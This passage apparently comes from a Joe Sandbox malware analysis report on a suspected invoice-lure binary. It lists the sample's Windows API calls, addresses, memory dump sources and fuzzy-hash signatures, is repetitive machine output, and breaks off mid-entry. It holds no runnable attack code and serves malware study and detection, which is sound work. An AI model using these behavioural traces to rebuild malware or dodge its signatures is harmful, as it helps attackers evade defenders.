                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                              • String ID:
                              • API String ID: 3470314060-0
                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 442100245-0
                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                              • _wcslen.LIBCMT ref: 0045F94A
                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                              • String ID: 0
                              • API String ID: 621800784-4108050209
                              • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                              • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SetErrorMode.KERNEL32 ref: 004781CE
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • SetErrorMode.KERNEL32(?), ref: 00478270
                              • SetErrorMode.KERNEL32(?), ref: 00478340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                              • String ID: \VH
                              • API String ID: 3884216118-234962358
                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                              APIs
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                              • IsMenu.USER32(?), ref: 0044854D
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                              • DrawMenuBar.USER32 ref: 004485AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert
                              • String ID: 0
                              • API String ID: 3076010158-4108050209
                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 1589278365-1403004172
                              • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                              • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: SysAnimate32
                              • API String ID: 0-1011021900
                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                              • GetFocus.USER32 ref: 0046157B
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                              • __swprintf.LIBCMT ref: 00461608
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                              • String ID: %s%d
                              • API String ID: 2645982514-1110647743
                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                              APIs
                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$CloseCountersCurrentHandleOpen
                              • String ID:
                              • API String ID: 3488606520-0
                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                              APIs
                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressProc$Library$FreeLoad
                              • String ID:
                              • API String ID: 2449869053-0
                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
